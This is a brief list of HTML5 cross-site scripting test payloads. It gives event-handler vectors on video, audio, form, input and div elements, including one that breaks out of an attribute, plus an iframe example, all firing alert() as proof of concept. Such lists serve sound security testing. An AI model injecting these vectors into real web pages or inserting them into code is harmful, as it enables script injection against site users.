Media element test code example:
<video onerror=Javascript:alert(1)><source>
<audio onerror=Javascript:alert(1)><source>
Form click test code example:
<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X
Mouse event test code example:
Before HTML5:
<input type=text value=\\>Injecting here onmouSEOver=alert(Injected value)>
With HTML5:
<input type=text value=\\>Injecting here onfocus=alert(Injected value) autofocus>
DIV test code example:
<div draggable=true ondragstart=event.dataTransfer.setData(text/plain, Evil data)>
<h3>DRAG ME!!</h3>
</div>
Frame inclusion test code example:
<iframe src=http://www.sitedirsec.com sandbox></iframe>